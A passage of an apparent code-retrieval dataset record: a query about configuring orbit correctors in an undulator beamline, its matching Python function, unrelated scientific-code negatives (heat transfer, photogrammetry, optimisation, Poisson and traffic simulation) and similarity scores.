inter1\r\n return elem.funcs(eta) * F\r\n if not no_rad:\r\n # We're integrating something non-linear for SP1\r\n self.vF_vect_vol = et.elems_2_array(self.mesh,\r\n F_func_cond,\r\n self.node_map)\r\n else:\r\n # Or something easier if we're only looking at heat.\r\n self.vF_vect_vol = np.array(self.uv_vol * lst_tmp).reshape(-1)\r\n else:\r\n def F_func_radiative(elem, eta):\r\n T = elem.eval_elem(self.node_map, self.lst_tmp, [eta])[0]\r\n vk = self.fq_list[self.rad]\r\n try:\r\n vk_minus = self.fq_list[self.rad - 1]\r\n except:\r\n vk_minus = self.v0_frequency\r\n n = self.refr_idx_vol\r\n F = 4.0 * sconst.pi * self.B_int_function(T, n, vk, vk_minus)\r\n return elem.funcs(eta) * F\r\n\r\n self.vF_vect_vol = et.elems_2_array(self.mesh,\r\n F_func_radiative,\r\n 
self.node_map)\r\n # The path integral vf:\r\n if self.cond == True:\r\n def f_func_cond(elem, eta):\r\n Tb = self.background_temperature\r\n Tn = elem.eval_elem(self.node_map, self.lst_tmp, [eta])[0]\r\n n = self.refr_idx_background\r\n vk = self.v0_frequency\r\n vk_minus = 0\r\n Bb0 = self.B_int_function(Tb, n, vk, vk_minus)\r\n Bn0 = self.B_int_function(Tn, n, vk, vk_minus)\r\n B_coeff = (self.alpha * sconst.pi) / self.convect_coeff\r\n f = Tb + B_coeff * (Bb0 - Bn0)\r\n return elem.funcs(eta) * f\r\n if not no_rad:\r\n self.vf_vect_bound = et.edge_2_array(self.mesh,\r\n \"Boundary\",\r\n f_func_cond,\r\n self.node_map)\r\n else:\r\n try:\r\n self.vf_vect_bound = self.cache_tb_integral_array\r\n except AttributeError:\r\n def elem_functor(elem, eta): return elem.funcs(eta)\r\n self.cache_tb_integral_array = et.edge_2_array(self.mesh,\r\n \"Boundary\",\r\n elem_functor,\r\n self.node_map)\r\n self.cache_tb_integral_array *= self.background_temperature\r\n self.vf_vect_bound = self.cache_tb_integral_array\r\n \r\n else:\r\n # Radiation f = 4*pi*B^{(k)}(T_b, n_g)\r\n def f_func_radiative(elem, eta):\r\n T = self.background_temperature\r\n vk = self.fq_list[self.rad]\r\n try:\r\n vk_minus = self.fq_list[self.rad - 1]\r\n except:\r\n vk_minus = self.v0_frequency\r\n n = self.refr_idx_vol\r\n f = 4 * sconst.pi * self.B_int_function(T, n, vk, vk_minus)\r\n return elem.funcs(eta) * f\r\n\r\n self.vf_vect_bound = et.edge_2_array(self.mesh,\r\n \"Boundary\",\r\n f_func_radiative,\r\n self.node_map)\r\n assert (self.vF_vect_vol.size == self.vF_vect_vol.shape[0])\r\n assert (self.vf_vect_bound.size == self.vf_vect_bound.shape[0])\r\n assert (self.vf_vect_bound.shape[0] == \\\r\n self.vF_vect_vol.shape[0])", "def __ComputeApproximateVals_RzRyRz(self, cameraPoints, groundPoints):\n\n # Find approximate values\n cameraPoints = cameraPoints.reshape(np.size(cameraPoints), 1)\n groundPointsXY = groundPoints[0:2, :].T\n groundPointsXY = groundPointsXY.reshape(np.size(groundPointsXY), 1)\n groundPointsZ = groundPoints[2, :].T\n\n n = int(len(cameraPoints)) # number of observations\n u = 4 # 4 conform parameters\n\n A = np.zeros((n, u)) # A matrix (n,u)\n\n j = 0\n for i in range(len(cameraPoints)):\n if i % 2 == 0:\n A[i, 0] = 1\n A[i, 1] = 0\n A[i, 2] = cameraPoints[j]\n A[i, 3] = cameraPoints[j + 1]\n else:\n A[i, 0] = 0\n A[i, 1] = 1\n A[i, 2] = cameraPoints[j + 1]\n A[i, 3] = -cameraPoints[j]\n j += 2\n\n X = np.dot(la.inv(np.dot(np.transpose(A), A)), np.dot(np.transpose(A), groundPointsXY))\n\n # now we can compute the rest of the params\n X0 = X[0]\n Y0 = X[1]\n kappa = np.arctan2(-X[3], X[2])\n lam = np.sqrt(X[2] ** 2 + X[3] ** 2)\n Z0 = np.average(groundPointsZ) + (lam) * self.camera.focalLength\n\n adjustment_results = {\"X0\": X0[0], \"Y0\": Y0[0], \"Z0\": Z0[0], \"omega\": 0, \"phi\": 0,\n \"kappa\": np.rad2deg(kappa[0])}\n\n self.__exteriorOrientationParameters = np.array(\n [X0[0], Y0[0], Z0[0], 0.2, 0.2, kappa[0]]).T # updating the exterior orientation params\n # self.__exteriorOrientationParameters = np.array([202225, 742447, 657.81, 0, 0, kappa[0]]).T\n #return adjustment_results", "def solver(u_init, eta_0, eta, eta_lin, T, H, L_lhs, L_rhs, alpha, gamma, B, D, C, ftol = 1e-3, max_iter = 5000, verbose = 0, nnls_max_iter=30):\n\n # Raise('NotImplementedError: only adjusted the arguments.')\n #Need to incorporate L_lhs into stacked and appropriate w_lin updates, u_update and eta_lin increments\n #precompute the expensive operation:\n lin_penalties = 1/np.sqrt(2*eta_lin)\n eta_T_H_L_stacked = 
scipy.sparse.vstack([T.multiply(1/np.sqrt(2*eta_0))] + [H[i].multiply(1/np.sqrt(2*eta[i])) for i in range(len(H))] + [L_lhs.multiply(lin_penalties[:,None])])\n #!!!!\n# premultiplied_lhs = eta_T_H_stacked.T.dot(eta_T_H_stacked).toarray()\n #!!!!\n u_prev = u_init + 1\n u = u_init\n count = 0\n obj_history = []\n relaxed_obj_history = [-1, 0.1] #just two initial values to enter the loop\n while np.abs((relaxed_obj_history[-2] - relaxed_obj_history[-1])/relaxed_obj_history[-2]) > ftol and count < max_iter:#np.linalg.norm(u - u_prev, np.inf) > 1e-3 and count < max_iter: #Maybe all of them stop changing\n start = time.time()\n \n u_prev = np.copy(u)\n w_0 = w_0_update(eta_0, u, T, alpha, B) \n w = w_update(u, H, gamma, D, C) \n w_lin = w_lin_update(u, L_lhs, L_rhs)\n# u = u_update(eta_0, eta, w_0, w, eta_T_H_stacked, nnls_max_iter=50)\n #!!!!\n # u = u_update(eta_0, eta, w_0, w, eta_T_H_L_stacked, nnls_max_iter=30)\n u = u_update(eta_0, eta, eta_lin, w_0, w, w_lin, eta_T_H_L_stacked, premultiplied_lhs = None, nnls_max_iter=nnls_max_iter)\n #!!!!\n count += 1 \n if count == 10:\n u_inf = np.copy(u)\n w_0_inf = w_0[:]\n w_inf = w[:]\n w_lin_inf = w_lin[:]\n if count > 10 and np.abs(cur_obj) > 1e+15: #HANDLE THIS BETTER!!!\n print('INFINITY! RETURNING u at the 10-th iteration to enter the feasibility loop')\n return u_inf, w_0_inf, w_inf, w_lin_inf, obj_history, relaxed_obj_history\n \n cur_obj = obj_u_opt_N_fixed(u, T, alpha, B)\n obj_history.append(cur_obj)\n cur_relaxed_obj = relaxed_obj_u_opt_N_fixed(u, w_0, w, w_lin, eta_0, eta, eta_lin, T, H, L_lhs, alpha, B)\n # relaxed_obj_u_opt_N_fixed(u, w_0, w, eta_0, eta, T, H, alpha, B)\n relaxed_obj_history.append(cur_relaxed_obj) \n \n stop = time.time()\n duration = stop-start\n \n if count%1 == 0 and verbose: \n stopping_criterion = np.abs((relaxed_obj_history[-2] - relaxed_obj_history[-1])/relaxed_obj_history[-2])\n print(' iter = {}, stopping criterion:{}, OBJ {}'.format(count, stopping_criterion, cur_obj))\n print(' This iteration took: {}'.format(duration))\n return u, w_0, w, w_lin, obj_history, relaxed_obj_history", "def potentialSolver(self, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n # solve potential\n for it in np.arange(1,max_it+1):\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n\n #check for convergence*/\n if it%25==0:\n sum = 0;\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n\n R = -self.phi[i][j][k]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1])\n\n sum += R*R;\n\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n \n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged" ]
[ "0.6054454", "0.6029055", "0.6029055", "0.6029055", "0.59086585", "0.5886708", "0.585231", "0.58431363", "0.57428247", "0.57226473", "0.56672513", "0.5646705", "0.5617193", "0.5610204", "0.56079906", "0.5607317", "0.55761766", "0.5571415", "0.5559164", "0.55436873", "0.5521621", "0.55207", "0.55093014", "0.5499706", "0.5499667", "0.54869825", "0.5486826", "0.54728913", "0.5470154", "0.54368365", "0.5433071", "0.54319227", "0.5422952", "0.5409021", "0.54012144", "0.53964734", "0.5388829", "0.53859365", "0.53741527", "0.53734934", "0.5373185", "0.53530705", "0.534997", "0.5342046", "0.53376067", "0.5331183", "0.5327867", "0.53251654", "0.5322697", "0.53155565", "0.5309603", "0.52899045", "0.5287648", "0.52862257", "0.5281322", "0.52755153", "0.52585393", "0.5254314", "0.5254259", "0.52516496", "0.5249529", "0.5249105", "0.5248174", "0.52410614", "0.5230499", "0.5229494", "0.52263767", "0.52238584", "0.52238584", "0.52192396", "0.5209829", "0.5207622", "0.52060604", "0.52039814", "0.5196565", "0.5195603", "0.51884896", "0.51810807", "0.5176612", "0.51712227", "0.5169783", "0.5167931", "0.51669854", "0.51662415", "0.51635164", "0.5162033", "0.5157795", "0.51550794", "0.5151991", "0.5149914", "0.5149888", "0.51492214", "0.51488674", "0.51453954", "0.51448333", "0.51448166", "0.51445514", "0.5140667", "0.5139292", "0.51387143" ]
0.56180215
12
I want to use this function to directly set up all orbit correctors.
def set_up_orbit_correctors(ps_beg, delay, id_slice1, ds_slice, zplot, id_slices, U_core, lambdaref):\n\n    SXSS = Chicane(3.2716, 0.362, 0.830399, delay[0])\n    HXSS = Chicane(3.2, 0.3636, 0.5828, delay[1])\n\n    OC2 = [CORR08, D1_SXSS, SXSS, D2_SXSS, QUAD09, CORR09]\n    OC3 = [CORR15, D1_HXSS, HXSS, D2_HXSS, QUAD16, CORR16]\n\n    ps_end1 = beam_transportation(ps_beg, U_core[0])\n    # ps_end1 is a 4-by-N array. N is the number of macro-particles. It is the full\n    # 4D phase space distribution at the end of the first undulator section.\n\n    # The id of the slice on the axis in the second undulator section\n    on_axis_id_U2 = int(id_slice1 + delay[0]/ds_slice + (8*110)*lambdaref/ds_slice)    # The last part is slippage\n    print(on_axis_id_U2)\n\n    ps_end_slice1 = beam_property_along_s(ps_end1, id_slices)[0:4, :]\n    ps_on_axis_2 = np.ravel(ps_end_slice1[:, on_axis_id_U2])\n    # print(ps_on_axis_2)\n\n    OC2_optimized = analyze_orbit_corrector(OC2[0], OC2[-1], OC2[1:-1], ps_on_axis_2)\n    print(OC2_optimized)\n\n    CORR08_new = Orbit_Corrector(OC2[0].length, OC2_optimized[0], OC2_optimized[2])\n    CORR09_new = Orbit_Corrector(OC2[-1].length, OC2_optimized[1], OC2_optimized[3])\n\n    # The whole U2 with optimized orbit correctors\n    U2_new = [CORR08_new] + OC2[1:-1] + [CORR09_new] + U_core[1]\n\n    ps_end2 = beam_transportation(ps_end1, U2_new)\n    # ps_end2 is a 4-by-N array. N is the number of macro-particles. It is the full\n    # 4D phase space distribution at the end of the second undulator section.\n\n    # The id of the slice on the axis in the third undulator section\n    on_axis_id_U3 = int(id_slice1 + (delay[0]+delay[1])/ds_slice + (14*110*lambdaref)/ds_slice)    # The last term is the slippage\n    print(on_axis_id_U3)\n\n    ps_end_slice2 = beam_property_along_s(ps_end2, id_slices)[0:4, :]\n    ps_on_axis_3 = np.ravel(ps_end_slice2[:, on_axis_id_U3])\n    # print(ps_on_axis_3)\n\n    OC3_optimized = analyze_orbit_corrector(OC3[0], OC3[-1], OC3[1:-1], ps_on_axis_3)\n    print(OC3_optimized)\n\n    CORR15_new = Orbit_Corrector(OC3[0].length, OC3_optimized[0], OC3_optimized[2])\n    CORR16_new = Orbit_Corrector(OC3[-1].length, OC3_optimized[1], OC3_optimized[3])\n\n    U3_new = [CORR15_new] + OC3[1:-1] + [CORR16_new] + U_core[2]\n\n    Undulator_Beamline = U_core[0] + U2_new + U3_new\n\n    return Undulator_Beamline
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setUp(self):\n self.precip_cube = setup_precipitation_cube()\n self.oe_cube = setup_orographic_enhancement_cube()\n self.vel_x = set_up_xy_velocity_cube(\"advection_velocity_x\")\n self.vel_y = set_up_xy_velocity_cube(\"advection_velocity_y\")\n for cube in [self.precip_cube, self.oe_cube]:\n cube.coord(\"projection_x_coordinate\").points = 600 * np.arange(3)\n cube.coord(\"projection_y_coordinate\").points = 600 * np.arange(4)", "def setup_orbit(self, t, halo_gas_density, galaxy_velocity):\n \n if any( [halo_gas_density > 1.0E-10] ) : # convert to mass density\n halo_gas_density = halo_gas_density * self.ic['mu_halo'] * cgs.mp\n \n # if t is an array, then use a cubic spline to make a function from the orbital\n # data. If t is a single value, then halo gas dnesity and velocity are constants..\n # make them into functions anyway to make rest of everything work...\n if np.size(halo_gas_density) > 1 : \n self.halo_density = interpolate.UnivariateSpline(t, halo_gas_density,k=3)\n else:\n self.halo_density = lambda x: halo_gas_density\n \n if np.size(galaxy_velocity) > 1:\n self.galaxy_velocity = interpolate.UnivariateSpline(t, galaxy_velocity ,k=3)\n else:\n self.galaxy_velocity = lambda x: galaxy_velocity", "def set_up_all_ao(self):\n self.set_as_active()\n \n # sets up ambient occlusion lighting\n self.set_up_world_ao()\n self.comp_add_ao()", "def set_up_world_ao(self):\n scene = self.set_as_active()\n new_world = bpy.context.blend_data.worlds.new('World of Wireframe')\n scene.world = new_world\n new_world.light_settings.use_ambient_occlusion = True\n new_world.light_settings.ao_factor = 0.3\n\n renderengine = scene.wirebomb.data_renderengine\n\n if renderengine == 'CYCLES':\n new_world.use_nodes = True\n new_world.node_tree.nodes[1].inputs[0].default_value = (1, 1, 1, 1)\n\n for node in new_world.node_tree.nodes:\n node.select = False\n \n elif renderengine == 'BLENDER_RENDER':\n new_world.horizon_color = (1, 1, 1)", "def setup(self):\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(self.Motor_A_EN, GPIO.OUT)\n GPIO.setup(self.Motor_B_EN, GPIO.OUT)\n GPIO.setup(self.Motor_A_Pin1, GPIO.OUT)\n GPIO.setup(self.Motor_A_Pin2, GPIO.OUT)\n GPIO.setup(self.Motor_B_Pin1, GPIO.OUT)\n GPIO.setup(self.Motor_B_Pin2, GPIO.OUT)\n self.motorStop() # Avoids automatic motor rotation after initialization\n try: # Try is used here to avoid errors due to repeated setting of PWM\n self.pwm_A = GPIO.PWM(self.Motor_A_EN, 1000)\n self.pwm_B = GPIO.PWM(self.Motor_B_EN, 1000)\n except:\n pass", "def set_oceanic_modes(self, basis, auto=True):\n if self._atmospheric_basis is None: # Presently, the ocean can not yet be set independently of an atmosphere.\n print('Atmosphere modes not set up. 
Add an atmosphere before adding an ocean!')\n print('Oceanic setup aborted.')\n return\n\n if auto:\n if self.gotemperature_params is None or isinstance(self.gotemperature_params, GroundTemperatureParams):\n self.gotemperature_params = OceanicTemperatureParams(self.scale_params)\n if self.oceanic_params is None:\n self.oceanic_params = OceanicParams(self.scale_params)\n\n self.ground_params = None\n self._ground_basis = None\n\n self.oceanic_basis = basis\n\n self._oceanic_latex_var_string = list()\n self._oceanic_var_string = list()\n self._ground_latex_var_string = list()\n self._ground_var_string = list()\n for i in range(1, self.nmod[1] + 1):\n self._oceanic_latex_var_string.append(r'psi_{\\rm o,' + str(i) + \"}\")\n self._oceanic_var_string.append(r'psi_o_' + str(i))\n if self.dynamic_T:\n self._oceanic_latex_var_string.append(r', T_{{\\rm o},0}')\n self._oceanic_var_string.append(r'T_o_0')\n for i in range(1, self.nmod[1] + 1):\n self._oceanic_latex_var_string.append(r'delta T_{{\\rm o},' + str(i) + \"}\")\n self._oceanic_var_string.append(r'delta_T_o_' + str(i))", "def setup(self):\n\n self._enable_torque(self._reg.TORQUE_ENABLE)\n self.change_operating_mode(self._reg.MODE_EXT_POSI)\n # set to max velocity\n self.change_veloity(self._default_velocity)", "def __init__(self):\n print(\"Initializing system...\"),\n for i in range(0,self.numAtoms):\n self.atoms.append(Atom())\n self.assignPositions()\n self.applyBoltzmannDist()\n self.correctMomenta()\n print(\"done.\")\n print(\"Simulation is now running.\")", "def setUp(self):\n from ampscan.core import AmpObject\n # Load 2 spheres with radius 1, and 1.2\n stl_path = get_path(\"stl_file_5.stl\") # R=1\n self.amp1 = AmpObject(stl_path)\n stl_path = get_path(\"stl_file_4.stl\") # R=1.2\n self.amp2 = AmpObject(stl_path)\n stl_path = get_path(\"stl_file.stl\")\n self.amp3 = AmpObject(stl_path)\n self.amp4 = AmpObject(stl_path)\n stl_path = get_path(\"cone1.stl\")\n self.cone1 = AmpObject(stl_path)\n stl_path = get_path(\"cone2.stl\")\n self.cone2 = AmpObject(stl_path)", "def __init__(self):\n\n # Loop over the models.\n for model_index in range(len(MODELS)):\n # Aliases.\n model = MODELS[model_index]\n model_text = MODEL_TEXT[model_index]\n\n # Loop over the tags.\n for tag in TAGS:\n # Set up the variables to loop over.\n if model in ['rotor', 'free_rotor']:\n vars = ['Z']\n elif model in ['iso_cone_free_rotor', 'iso_cone_torsionless']:\n vars = ['X']\n elif model in ['iso_cone']:\n vars = ['X', 'Z']\n elif model in ['double_rotor', 'pseudo-ellipse_free_rotor', 'pseudo-ellipse_torsionless']:\n vars = ['X', 'Y']\n elif model in ['pseudo-ellipse']:\n vars = ['X', 'Y', 'Z']\n else:\n raise RelaxError(\"Unknown model '%s'.\" % model)\n\n # Loop over the variables.\n for var in vars:\n # The file name.\n file_name = '_%s_%s_theta_%s_calc.agr' % (model, tag, lower(var))\n print(\"Creating the '*%s' files.\" % file_name)\n\n # Set up the eigenframe.\n self.setup_eigenframe(tag=tag)\n\n # The Kronecker product of the eigenframe rotation.\n Rx2_eigen = kron_prod(self.eigenframe, self.eigenframe)\n\n # Set the initial storage structures.\n self.init_storage()\n\n # Loop over the angle incs.\n for i in range(INC+1):\n # Get the angle for the increment.\n theta = self.get_angle(i-1, model=model, var=var)\n\n # Vary X.\n if var == 'X':\n theta_x = theta\n theta_y = THETA_Y\n theta_z = THETA_Z\n\n # Vary Y.\n elif var == 'Y':\n theta_x = THETA_X\n theta_y = theta\n theta_z = THETA_Z\n\n # Vary Z.\n elif var == 'Z':\n theta_x = THETA_X\n theta_y = 
THETA_Y\n theta_z = theta\n\n # Calculate the frame order matrices.\n if model == 'rotor':\n self.first_frame_order[i] = rotor.compile_1st_matrix_rotor(self.first_frame_order[i], self.eigenframe, theta_z)\n self.second_frame_order[i] = rotor.compile_2nd_matrix_rotor(self.second_frame_order[i], Rx2_eigen, theta_z)\n elif model == 'free_rotor':\n self.first_frame_order[i] = free_rotor.compile_1st_matrix_free_rotor(self.first_frame_order[i], self.eigenframe)\n self.second_frame_order[i] = free_rotor.compile_2nd_matrix_free_rotor(self.second_frame_order[i], Rx2_eigen)\n elif model == 'iso_cone':\n self.first_frame_order[i] = iso_cone.compile_1st_matrix_iso_cone(self.first_frame_order[i], self.eigenframe, theta_x, theta_z)\n self.second_frame_order[i] = iso_cone.compile_2nd_matrix_iso_cone(self.second_frame_order[i], Rx2_eigen, theta_x, theta_z)\n elif model == 'iso_cone_free_rotor':\n self.first_frame_order[i] = iso_cone_free_rotor.compile_1st_matrix_iso_cone_free_rotor(self.first_frame_order[i], self.eigenframe, theta_x)\n self.second_frame_order[i] = iso_cone_free_rotor.compile_2nd_matrix_iso_cone_free_rotor(self.second_frame_order[i], Rx2_eigen, theta_x)\n elif model == 'iso_cone_torsionless':\n self.first_frame_order[i] = iso_cone_torsionless.compile_1st_matrix_iso_cone_torsionless(self.first_frame_order[i], self.eigenframe, theta_x)\n self.second_frame_order[i] = iso_cone_torsionless.compile_2nd_matrix_iso_cone_torsionless(self.second_frame_order[i], Rx2_eigen, theta_x)\n elif model == 'pseudo-ellipse':\n self.first_frame_order[i] = pseudo_ellipse.compile_1st_matrix_pseudo_ellipse(self.first_frame_order[i], self.eigenframe, theta_x, theta_y, theta_z)\n self.second_frame_order[i] = pseudo_ellipse.compile_2nd_matrix_pseudo_ellipse(self.second_frame_order[i], Rx2_eigen, theta_x, theta_y, theta_z)\n elif model == 'pseudo-ellipse_free_rotor':\n self.first_frame_order[i] = pseudo_ellipse_free_rotor.compile_1st_matrix_pseudo_ellipse_free_rotor(self.first_frame_order[i], self.eigenframe, theta_x, theta_y)\n self.second_frame_order[i] = pseudo_ellipse_free_rotor.compile_2nd_matrix_pseudo_ellipse_free_rotor(self.second_frame_order[i], Rx2_eigen, theta_x, theta_y)\n elif model == 'pseudo-ellipse_torsionless':\n self.first_frame_order[i] = pseudo_ellipse_torsionless.compile_1st_matrix_pseudo_ellipse_torsionless(self.first_frame_order[i], self.eigenframe, theta_x, theta_y)\n self.second_frame_order[i] = pseudo_ellipse_torsionless.compile_2nd_matrix_pseudo_ellipse_torsionless(self.second_frame_order[i], Rx2_eigen, theta_x, theta_y)\n elif model == 'double_rotor':\n self.first_frame_order[i] = double_rotor.compile_1st_matrix_double_rotor(self.first_frame_order[i], self.eigenframe, theta_y, theta_x)\n self.second_frame_order[i] = double_rotor.compile_2nd_matrix_double_rotor(self.second_frame_order[i], Rx2_eigen, theta_y, theta_x)\n else:\n raise RelaxError(\"Unknown model '%s'.\" % model)\n\n # Write the data.\n self.write_data(file_name=file_name, model=model, model_text=model_text, var=var)", "def __init__(self, eqn_set=0, atmosphere=0, ra_steps=(1, 1e3, 40, True),\n kx_steps=(0.01, 1, 40, True), ky_steps=None, threeD=False, atmo_kwargs={}, eqn_args=[],\n eqn_kwargs={}, bc_kwargs={}):\n self._eqn_set = eqn_set\n self._atmosphere = atmosphere\n self._ra_steps = ra_steps\n self._kx_steps = kx_steps\n self._ky_steps = ky_steps\n self.threeD = threeD\n\n self._atmo_kwargs = atmo_kwargs\n self._eqn_args = eqn_args\n self._eqn_kwargs = eqn_kwargs\n self._bc_kwargs = bc_kwargs\n self.cf = 
CriticalFinder(self.solve_problem, CW)", "def initialize(self):\n self._setup_simulation_from_parameters()\n if \"orrb\" in self.constants.observation_providers:\n self._reset()\n self._goal = self._next_goal()\n self.update_goal_info()\n\n self.observer = self._build_observer()", "def init(self):\n self.l_motor = lazytalonsrx.LazyTalonSRX(Constants.IL_MOTOR_ID)\n self.r_motor = lazytalonsrx.LazyTalonSRX(Constants.IR_MOTOR_ID)\n self.l_motor.initialize(\n inverted=False, encoder=False, phase=False, name=\"Intake Left\")\n self.r_motor.initialize(\n inverted=True, encoder=False, phase=False, name=\"Intake Right\")", "def setup_initial_state(self):\n # collect the ids of vehicles in the network\n self.ids = self.vehicles.get_ids()\n self.controlled_ids = self.vehicles.get_controlled_ids()\n self.sumo_ids = self.vehicles.get_sumo_ids()\n self.rl_ids = self.vehicles.get_rl_ids()\n\n # dictionary of initial observations used while resetting vehicles after\n # each rollout\n self.initial_observations = dict.fromkeys(self.ids)\n\n # create the list of colors used to different between different types of\n # vehicles visually on sumo's gui\n #TODO: Get these colors working!\n # self.colors = {(255,0,0), (0,255,0),(0,0,255),(255,255,255)}\n self.colors = {}\n key_index = 1\n color_choice = np.random.choice(len(COLORS))\n for i in range(self.vehicles.num_types):\n self.colors[self.vehicles.types[i]] = \\\n COLORS[(color_choice + key_index) % len(COLORS)]\n key_index += 1\n\n for veh_id in self.ids:\n # set the colors of the vehicles based on their unique types\n veh_type = self.vehicles.get_state(veh_id, \"type\")\n self.traci_connection.vehicle.setColor(veh_id,\n self.colors[veh_type])\n\n # add the initial states to the vehicles class\n self.vehicles.set_edge(\n veh_id, self.traci_connection.vehicle.getRoadID(veh_id))\n self.vehicles.set_position(\n veh_id, self.traci_connection.vehicle.getLanePosition(veh_id))\n self.vehicles.set_lane(\n veh_id, self.traci_connection.vehicle.getLaneIndex(veh_id))\n self.vehicles.set_speed(\n veh_id, self.traci_connection.vehicle.getSpeed(veh_id))\n self.vehicles.set_route(\n veh_id, self.available_routes[self.vehicles.get_edge(veh_id)])\n self.vehicles.set_absolute_position(\n veh_id, self.get_x_by_id(veh_id))\n # the time step of the last lane change is always present in\n # the environment,but only used by sub-classes that apply lane\n # changing\n self.vehicles.set_state(veh_id, \"last_lc\",\n -1 * self.lane_change_duration)\n # some constant vehicle parameters\n self.vehicles.set_state(\n veh_id, \"length\",\n self.traci_connection.vehicle.getLength(veh_id))\n self.vehicles.set_state(veh_id, \"max_speed\", self.max_speed)\n\n # import initial state data to initial_observations dict\n self.initial_observations[veh_id] = dict()\n self.initial_observations[veh_id][\"type\"] = veh_type\n self.initial_observations[veh_id][\"edge\"] = \\\n self.traci_connection.vehicle.getRoadID(veh_id)\n self.initial_observations[veh_id][\"position\"] = \\\n self.traci_connection.vehicle.getLanePosition(veh_id)\n self.initial_observations[veh_id][\"lane\"] = \\\n self.traci_connection.vehicle.getLaneIndex(veh_id)\n self.initial_observations[veh_id][\"speed\"] = \\\n self.traci_connection.vehicle.getSpeed(veh_id)\n self.initial_observations[veh_id][\"route\"] = \\\n self.available_routes[self.initial_observations[veh_id][\"edge\"]]\n self.initial_observations[veh_id][\"absolute_position\"] = \\\n self.get_x_by_id(veh_id)\n\n # set speed mode\n self.set_speed_mode(veh_id)\n\n # set 
lane change mode\n self.set_lane_change_mode(veh_id)\n\n # save the initial state. This is used in the _reset function\n #\n route_id = \"route\" + self.initial_observations[veh_id][\"edge\"]\n pos = self.traci_connection.vehicle.getPosition(veh_id)\n\n self.initial_state[veh_id] = \\\n (self.initial_observations[veh_id][\"type\"], route_id,\n self.initial_observations[veh_id][\"lane\"],\n self.initial_observations[veh_id][\"position\"],\n self.initial_observations[veh_id][\"speed\"], pos)\n\n # collect list of sorted vehicle ids\n self.sorted_ids, self.sorted_extra_data = self.sort_by_position()\n\n # collect headway, leader id, and follower id data\n for veh_id in self.ids:\n headway = self.traci_connection.vehicle.getLeader(veh_id, 2000)\n if headway is None:\n self.vehicles.set_leader(veh_id, None)\n self.vehicles.set_headway(veh_id, 9e9)\n else:\n self.vehicles.set_leader(veh_id, headway[0])\n self.vehicles.set_headway(veh_id, headway[1])\n self.vehicles.set_follower(headway[0], veh_id)\n\n # contains the last lc before the current step\n self.prev_last_lc = dict()\n for veh_id in self.ids:\n self.prev_last_lc[veh_id] = self.vehicles.get_state(veh_id,\n \"last_lc\")\n\n # subscribe the requested states for traci-related speedups\n for veh_id in self.ids:\n self.traci_connection.vehicle.subscribe(\n veh_id, [tc.VAR_LANE_INDEX, tc.VAR_LANEPOSITION,\n tc.VAR_ROAD_ID, tc.VAR_SPEED])\n self.traci_connection.vehicle.subscribeLeader(veh_id, 2000)", "def _setup(self) -> None:\n # Call base implementation\n super()._setup()\n\n # Configure the low-level integrator\n engine_options = self.simulator.engine.get_options()\n engine_options[\"stepper\"][\"iterMax\"] = 0\n engine_options[\"stepper\"][\"dtMax\"] = min(0.02, self.step_dt)\n engine_options[\"stepper\"][\"logInternalStepperSteps\"] = False\n\n # Set maximum computation time for single internal integration steps\n if self.debug:\n engine_options[\"stepper\"][\"timeout\"] = 0.0\n else:\n engine_options[\"stepper\"][\"timeout\"] = 2.0\n\n # Enable logging of geometries in debug mode\n if self.debug:\n engine_options[\"telemetry\"][\"isPersistent\"] = True\n\n # Update engine options\n self.simulator.engine.set_options(engine_options)\n\n # Set robot in neutral configuration\n qpos = self._neutral()\n framesForwardKinematics(\n self.robot.pinocchio_model, self.robot.pinocchio_data, qpos)", "def setUp(self):\n self.OR_Neuron = Neuron([12, 12], Sigmoid().activate, bias=-6)", "def _propagateOrbits(self, orbits, t1):\n err = \"This backend does not have orbit propagation implemented.\"\n raise NotImplementedError(err)", "def __init__(self):\n BasicEngine.__init__(self)\n self._active_qubits = 0\n self._num_rotations = 0\n self._rotations = []", "def initialize_plot_options(config):\n\n OP = orbit_plots.OrbitPlots()\n\n # target information\n OP.target = OP.title = config.get('plotting', 'target', fallback='')\n OP.Hip = config.getint('data_paths', 'HipID', fallback=0)\n OP.nplanets = config.getint('mcmc_settings', 'nplanets')\n\n # read data\n OP.RVfile = config.get('data_paths', 'RVFile', fallback=None)\n OP.relAstfile = config.get('data_paths', 'AstrometryFile', fallback=None)\n OP.GaiaDataDir = config.get('data_paths', 'GaiaDataDir', fallback=None)\n OP.Hip2DataDir = config.get('data_paths', 'Hip2DataDir', fallback=None)\n OP.Hip1DataDir = config.get('data_paths', 'Hip1DataDir', fallback=None)\n OP.HGCAFile = config.get('data_paths', 'HGCAFile', fallback=None)\n \n #read in the mcmc chains\n OP.burnin = config.getint('plotting', 'burnin', 
